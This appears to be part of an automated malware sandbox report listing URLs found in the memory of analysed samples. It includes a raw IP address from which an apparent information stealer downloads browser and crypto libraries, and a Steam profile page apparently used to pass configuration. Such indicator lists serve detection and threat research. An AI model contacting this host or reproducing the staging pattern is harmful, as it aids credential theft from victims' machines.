                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: explorer.exe, 00000002.00000000.1403647144.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                    Source: explorer.exe, 00000002.00000000.1401095167.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                    Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                    Source: EE6.exe, 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000000.2053146567.00000000004B4000.00000002.00000001.01000000.00000008.sdmp, katDDA4.tmp.11.drString found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
                    Source: explorer.exe, 00000002.00000000.1402569420.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1402546303.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1400425752.0000000002C80000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: katDDA4.tmp, 0000000C.00000003.2272187198.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.12.dr, mozglue[1].dll.12.dr, freebl3.dll.12.dr, nss3.dll.12.dr, softokn3[1].dll.12.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: explorer.exe, 00000002.00000000.1403647144.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                    Source: katDDA4.tmp, katDDA4.tmp, 0000000C.00000002.2589136080.000000006E6CD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.12.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: katDDA4.tmp, 0000000C.00000002.2545656543.000000001DE0D000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: 5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: 76561199689717899[1].htm.12.drString found in binary or memory: https://37.27.34.12
                    Source: katDDA4.tmp, 0000000C.00000003.2085052151.000000000096E000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000960000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000960000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000976000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000983000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/
                    Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/=
                    Source: katDDA4.tmp, 0000000C.00000003.2144632677.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000972000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/W
                    Source: katDDA4.tmp, 0000000C.00000003.2114692645.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000988000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/f
                    Source: katDDA4.tmp, 0000000C.00000003.2272992305.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/freebl3.dll
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2272992305.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/freebl3.dll0u
                    Source: katDDA4.tmp, 0000000C.00000003.2272992305.00000000009DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/freebl3.dllBu
                    Source: katDDA4.tmp, 0000000C.00000003.2272992305.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/freebl3.dllxu_
                    Source: katDDA4.tmp, 0000000C.00000003.2085052151.000000000096E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/m
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/mozglue.dll
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/mozglue.dlleub
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/msvcp140.dll
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/msvcp140.dll/
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/msvcp140.dlly
                    Source: katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/nss3.dll
                    Source: katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/nss3.dllP
                    Source: katDDA4.tmp, 0000000C.00000003.2085052151.0000000000988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/p
                    Source: katDDA4.tmp, 0000000C.00000003.2369519792.00000000009C7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/softokn3.dll
                    Source: katDDA4.tmp, 0000000C.00000003.2398637104.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/softokn3.dll0:
                    Source: katDDA4.tmp, 0000000C.00000003.2398637104.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/softokn3.dllX:/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/sqls.dll
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/vcruntime140.dll
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12/vcruntime140.dlly
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12BFBKFB
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://37.27.34.12KEBFIE
                    Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                    Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                    Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
                    Source: explorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
                    Source: explorer.exe, 00000002.00000000.1401695324.000000000702D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                    Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                    Source: explorer.exe, 00000002.00000000.1403647144.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                    Source: 76561199689717899[1].htm.12.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                    Source: katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
                    Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
                    Source: explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
                    Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: 5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                    Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
